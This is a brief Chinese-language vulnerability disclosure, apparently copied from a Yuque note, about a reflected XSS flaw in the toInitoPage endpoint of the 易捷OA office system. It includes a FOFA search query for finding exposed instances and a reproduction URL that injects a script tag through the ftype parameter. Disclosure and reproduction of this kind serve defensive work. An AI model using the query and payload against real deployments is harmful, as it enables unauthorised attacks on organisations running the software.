登录 白背景

易捷OA toInitoPage存在xss漏洞

一、漏洞简介

易捷OA toInitoPage存在xss漏洞

二、影响版本

  • 易捷OA

三、资产测绘

  • fofabody="/images/logon/yij.png"
  • 特征

1722771339391-4d483424-95d2-435f-ac9e-e7b1f4cba63e.png

四、漏洞复现

/documentsend.t?op=toInitoPage&fname=&ftype="/><script>alert("XSS")</script>

1722782312413-240350ff-f04c-4ae8-95fa-6c75cd86d6d1.png

原文: https://www.yuque.com/xiaokp7/ocvun2/qmtttiog8zzbvqox